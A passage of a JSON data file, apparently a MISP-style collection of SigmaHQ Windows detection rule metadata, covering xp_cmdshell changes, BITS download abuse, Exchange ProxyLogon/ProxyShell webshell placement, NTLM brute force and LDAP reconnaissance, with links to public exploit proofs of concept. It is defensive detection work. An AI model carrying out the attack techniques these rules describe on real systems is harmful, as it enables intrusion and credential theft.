"meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/12", + "falsepositive": [ + "Legitimate enable/disable of the setting", + "Note that since the event contain the change for both values. This means that this will trigger on both enable and disable" + ], + "filename": "win_mssql_xp_cmdshell_change.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_xp_cmdshell_change.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "d08dd86f-681e-4a00-a92c-1db218754417", + "value": "MSSQL XPCmdshell Option Change" + }, + { + "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/09/01", + "falsepositive": [ + "Legitimate Atera agent installation" + ], + "filename": "win_software_atera_rmm_agent_install.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_software_atera_rmm_agent_install.yml" + ], + "tags": [ + "attack.t1219" + ] + }, + "uuid": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", + "value": "Atera Agent Installation" + }, + { + "description": "Detects backup catalog deletions", + "meta": { + "author": "Florian Roth (rule), Tom U. @c_APT_ure (collection)", + "creation_date": "2017/05/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_susp_backup_delete.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx", + "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_susp_backup_delete.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ] + }, + "uuid": "9703792d-fd9a-456d-a672-ff92efe4806a", + "value": "Backup Catalog Deleted" + }, + { + "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/05/09", + "falsepositive": [ + "MsMpEng.exe can crash when C:\\ is full" + ], + "filename": "win_susp_msmpeng_crash.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5", + "https://technet.microsoft.com/en-us/library/security/4022344", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_susp_msmpeng_crash.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1211", + "attack.t1562.001" + ] + }, + "uuid": "6c82cf5c-090d-4d57-9188-533577631108", + "value": "Microsoft Malware Protection Engine Crash" + }, + { + "description": "Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688", + "meta": { + "author": "Florian Roth, wagga", + "creation_date": "2020/02/29", + "falsepositive": [ + "Unknown" + ], + "filename": "win_vul_cve_2020_0688.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/", + "https://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_vul_cve_2020_0688.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "d6266bf5-935e-4661-b477-78772735a7cb", + "value": "CVE-2020-0688 Exploitation via Eventlog" + }, + { + "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/22", + "falsepositive": [ + "Other MSI packages for which your admins have used that name" + ], + "filename": "win_vul_cve_2021_41379.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/klinix5/InstallerFileTakeOver", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_vul_cve_2021_41379.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", + "value": "LPE InstallerFileTakeOver PoC CVE-2021-41379" + }, + { + "description": "Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events.", + "meta": { + "author": "Pushkarev Dmitry", + "creation_date": "2020/06/28", + "falsepositive": [ + "Need tuning applocker or add exceptions in SIEM" + ], + "filename": "win_applocker_file_was_not_allowed_to_run.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/using-event-viewer-with-applocker", + "https://nxlog.co/documentation/nxlog-user-guide/applocker.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/applocker/win_applocker_file_was_not_allowed_to_run.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.006", + "attack.t1059.007" + ] + }, + "uuid": "401e5d00-b944-11ea-8f9a-00163ecd60ae", + "value": "File Was Not Allowed To Run" + }, + { + "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "win_bits_client_susp_domain.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://twitter.com/malmoeb/status/1535142803075960832", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_domain.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" + ] + }, + "uuid": "d635249d-86b5-4dad-a8c7-d7272b788586", + "value": "Suspicious Download with BITS from Suspicious TLD" + }, + { + "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/03/01", + "falsepositive": [ + "Administrator PowerShell scripts" + ], + "filename": "win_bits_client_susp_local_file.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_local_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" + ] + }, + "uuid": "b85e5894-9b19-4d86-8c87-a2f3b81f0521", + "value": "Suspicious Download File Extension with BITS" + }, + { + "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/28", + "falsepositive": [ + "Administrator PowerShell scripts" + ], + "filename": "win_bits_client_susp_local_folder.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_local_folder.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" + ] + }, + "uuid": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", + "value": "Download with BITS to Suspicious Folder" + }, + { + "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/03/01", + "falsepositive": [ + "Administrator PowerShell scripts" + ], + "filename": "win_bits_client_susp_powershell_job.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_powershell_job.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" + ] + }, + "uuid": "fe3a2d49-f255-4d10-935c-bda7391108eb", + "value": "Suspicious Task Added by Powershell" + }, + { + "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/03/01", + "falsepositive": [ + "Administrator PowerShell scripts" + ], + "filename": "win_bits_client_susp_use_bitsadmin.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_use_bitsadmin.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" + ] + }, + "uuid": "1ff315dc-2a3a-4b71-8dde-873818d25d39", + "value": "Suspicious Task Added by Bitsadmin" + }, + { + "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/10", + "falsepositive": [ + "Other legitimate domains used by software updaters" + ], + "filename": "win_bits_client_uncommon_domain.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://twitter.com/malmoeb/status/1535142803075960832", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_uncommon_domain.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" + ] + }, + "uuid": "6d44fb93-e7d2-475c-9d3d-54c9c1e33427", + "value": "Suspicious Uncommon Download with BITS from Suspicious TLD" + }, + { + "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. It often means the file's signature is revoked or expired", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2022/01/20", + "falsepositive": [ + "Antivirus products" + ], + "filename": "win_codeintegrity_attempted_dll_load.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1483810148602814466", + "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "f8931561-97f5-4c46-907f-0a4a592e47a7", + "value": "Code Integrity Attempted DLL Load" + }, + { + "description": "Detects blocked load attempts of revoked drivers", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/11/10", + "falsepositive": [ + "Unknown" + ], + "filename": "win_codeintegrity_revoked_driver.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/wdormann/status/1590434950335320065", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543" + ] + }, + "uuid": "9b72b82d-f1c5-4632-b589-187159bc6ec1", + "value": "Block Load Of Revoked Driver" + }, + { + "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/11/10", + "falsepositive": [ + "Unknown" + ], + "filename": "win_codeintergiry_blocked_driver_load.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/wdormann/status/1590434950335320065", + "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintergiry_blocked_driver_load.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543" + ] + }, + "uuid": "e4be5675-4a53-426a-8c81-a8bb2387e947", + "value": "Code Integrity Blocked Driver Load" + }, + { + "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/14", + "falsepositive": [ + "Legitimate package hosted on a known and authorized remote location" + ], + "filename": "win_diagnosis_scripted_load_remote_diagcab.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/nas_bench/status/1539679555908141061", + "https://twitter.com/j00sean/status/1537750439701225472", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "50cb47b8-2c33-4b23-a2e9-4600657d9746", + "value": "Loading Diagcab Package From Remote Path" + }, + { + "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", + "meta": { + "author": "Tim Burrell", + "creation_date": "2020/02/07", + "falsepositive": [ + "Unknown" + ], + "filename": "win_apt_gallium.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_apt_gallium.yml" + ], + "tags": [ + "attack.credential_access", + "attack.command_and_control", + "attack.t1071" + ] + }, + "uuid": "3db10f25-2527-4b79-8d4b-471eb900ee29", + "value": "GALLIUM Artefacts - Builtin" + }, + { + "description": "This rule detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/05/08", + "falsepositive": [ + "Unknown" + ], + "filename": "win_susp_dns_config.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", + "https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx", + "https://twitter.com/gentilkiwi/status/861641945944391680", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_susp_dns_config.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "cbe51394-cd93-4473-b555-edf0144952d9", + "value": "DNS Server Error Failed Loading the ServerLevelPluginDLL" + }, + { + "description": "Detects plugged USB devices", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/11/09", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "win_usb_device_plugged.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/", + "https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/driverframeworks/win_usb_device_plugged.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1200" + ] + }, + "uuid": "1a4bd6e3-4c6e-405d-a9a3-53a116e341d4", + "value": "USB Device Plugged" + }, + { + "description": "A rule has been modified in the Windows Firewall exception list", + "meta": { + "author": "frack113", + "creation_date": "2022/02/19", + "falsepositive": "No established falsepositives", + "filename": "win_firewall_as_add_rule.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_add_rule.yml" + ], + "tags": "No established tags" + }, + "uuid": "cde0a575-7d3d-4a49-9817-b8004a7bf105", + "value": "Added Rule in Windows Firewall with Advanced Security" + }, + { + "description": "A rule has been modified in the Windows Firewall exception list", + "meta": { + "author": "frack113", + "creation_date": "2022/02/19", + "falsepositive": "No established falsepositives", + "filename": "win_firewall_as_change_rule.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_change_rule.yml" + ], + "tags": "No established tags" + }, + "uuid": "5570c4d9-8fdd-4622-965b-403a5a101aa0", + "value": "Modified Rule in Windows Firewall with Advanced Security" + }, + { + "description": "A rule has been deleted in the Windows Firewall exception list.", + "meta": { + "author": "frack113", + "creation_date": "2022/02/19", + "falsepositive": "No established falsepositives", + "filename": "win_firewall_as_delete_rule.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_delete_rule.yml" + ], + "tags": "No established tags" + }, + "uuid": "c187c075-bb3e-4c62-b4fa-beae0ffc211f", + "value": "Delete Rule in Windows Firewall with Advanced Security" + }, + { + "description": "The Windows Firewall service failed to load Group Policy.", + "meta": { + "author": "frack113", + "creation_date": "2022/02/19", + "falsepositive": "No established falsepositives", + "filename": "win_firewall_as_failed.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_failed.yml" + ], + "tags": "No established tags" + }, + "uuid": "7ec15688-fd24-4177-ba43-1a950537ee39", + "value": "Failed to Load Policy in Windows Firewall with Advanced Security" + }, + { + "description": "Windows Firewall has been reset to its default configuration.", + "meta": { + "author": "frack113", + "creation_date": "2022/02/19", + "falsepositive": "No established falsepositives", + "filename": "win_firewall_as_reset.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_reset.yml" + ], + "tags": "No established tags" + }, + "uuid": "04b60639-39c0-412a-9fbe-e82499c881a3", + "value": "Reset to Default Configuration Windows Firewall with Advanced Security" + }, + { + "description": "Setting have been change in Windows Firewall", + "meta": { + "author": "frack113", + "creation_date": "2022/02/19", + "falsepositive": "No established falsepositives", + "filename": "win_firewall_as_setting_change.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_setting_change.yml" + ], + "tags": "No established tags" + }, + "uuid": "00bb5bd5-1379-4fcf-a965-a5b6f7478064", + "value": "Setting Change in Windows Firewall with Advanced Security" + }, + { + "description": "Detects possible Active Directory enumeration via LDAP", + "meta": { + "author": "Adeem Mawani", + "creation_date": "2021/06/22", + "falsepositive": "No established falsepositives", + "filename": "win_ldap_recon.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726", + "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1", + "https://github.com/BloodHoundAD/SharpHound3/blob/7d96b991b1887ff50349ce59c80980bc0d95c86a/SharpHound3/LdapBuilder.cs", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ldap/win_ldap_recon.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.002", + "attack.t1087.002", + "attack.t1482" + ] + }, + "uuid": "31d68132-4038-47c7-8f8e-635a39a7c174", + "value": "LDAP Reconnaissance / Active Directory Enumeration" + }, + { + "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321", + "meta": { + "author": "Florian Roth, @testanull", + "creation_date": "2021/11/18", + "falsepositive": [ + "Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues" + ], + "filename": "win_exchange_cve_2021_42321.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42321", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_cve_2021_42321.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1210" + ] + }, + "uuid": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", + "value": "Possible Exploitation of Exchange RCE CVE-2021-42321" + }, + { + "description": "Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invocation of Set-OabVirtualDirectory", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/08/09", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_exchange_proxylogon_oabvirtualdir.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml" + ], + "tags": [ + "attack.t1587.001", + "attack.resource_development" + ] + }, + "uuid": "550d3350-bb8a-4ff3-9533-2ba533f4a1c0", + "value": "ProxyLogon MSExchange OabVirtualDirectory" + }, + { + "description": "Detects a write of an Exchange CSR to an untypical directory or with aspx name suffix which can be used to place a webshell", + "meta": { + "author": "Max Altgelt", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_exchange_proxyshell_certificate_generation.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/GossiTheDog/status/1429175908905127938", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxyshell_certificate_generation.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "b7bc7038-638b-4ffd-880c-292c692209ef", + "value": "Certificate Request Export to Exchange Webserver" + }, + { + "description": "Detects a successful export of an Exchange mailbox to untypical directory or with aspx name suffix which can be used to place a webshell or the needed role assignment for it", + "meta": { + "author": "Florian Roth, Rich Warren, Christian Burkard", + "creation_date": "2021/08/09", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_exchange_proxyshell_mailbox_export.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxyshell_mailbox_export.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "516376b4-05cd-4122-bae0-ad7641c38d48", + "value": "Mailbox Export to Exchange Webserver" + }, + { + "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/27", + "falsepositive": [ + "Unknown" + ], + "filename": "win_exchange_proxyshell_remove_mailbox_export.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/modules/exploits/windows/http/exchange_proxyshell_rce.rb#L430", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxyshell_remove_mailbox_export.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ] + }, + "uuid": "09570ae5-889e-43ea-aac0-0e1221fb3d95", + "value": "Remove Exported Mailbox from Exchange Webserver" + }, + { + "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", + "meta": { + "author": "Jose Rodriguez @Cyb3rPandaH", + "creation_date": "2021/03/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/OTR_Community/status/1371053369071132675", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_set_oabvirtualdirectory_externalurl.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "9db37458-4df2-46a5-95ab-307e7f29e675", + "value": "Exchange Set OabVirtualDirectory ExternalUrl Property" + }, + { + "description": "Detects the Installation of a Exchange Transport Agent", + "meta": { + "author": "Tobias Michalski", + "creation_date": "2021/06/08", + "falsepositive": [ + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." + ], + "filename": "win_exchange_transportagent.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/blueteamsec1/status/1401290874202382336?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_transportagent.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.002" + ] + }, + "uuid": "4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6", + "value": "MSExchange Transport Agent Installation - Builtin" + }, + { + "description": "Detects a failed installation of a Exchange Transport Agent", + "meta": { + "author": "Tobias Michalski", + "creation_date": "2021/06/08", + "falsepositive": [ + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." + ], + "filename": "win_exchange_transportagent_failed.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/blueteamsec1/status/1401290874202382336?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_transportagent_failed.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.002" + ] + }, + "uuid": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", + "value": "Failed MSExchange Transport Agent Installation" + }, + { + "description": "Detects logons using NTLM, which could be caused by a legacy source or attackers", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/06/08", + "falsepositive": [ + "Legacy hosts" + ], + "filename": "win_susp_ntlm_auth.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/JohnLaTwC/status/1004895028995477505", + "https://goo.gl/PsqrhT", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1550.002" + ] + }, + "uuid": "98c3bcf1-56f2-49dc-9d8d-c66cf190238b", + "value": "NTLM Logon" + }, + { + "description": "Detects common NTLM brute force device names", + "meta": { + "author": "Jerry Shockley '@jsh0x'", + "creation_date": "2022/02/02", + "falsepositive": [ + "Systems with names equal to the spoofed ones used by the brute force tools" + ], + "filename": "win_susp_ntlm_brute_force.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.varonis.com/blog/investigate-ntlm-brute-force", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_brute_force.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ] + }, + "uuid": "9c8acf1a-cbf9-4db6-b63c-74baabe03e59", + "value": "NTLM Brute Force" + }, + { + "description": "Detects logons using NTLM to hosts that are potentially not part of the domain.", + "meta": { + "author": "James Pemberton", + "creation_date": "2020/05/22", + "falsepositive": [ + "Host connections to valid domains, exclude these.", + "Host connections not using host FQDN.", + "Host 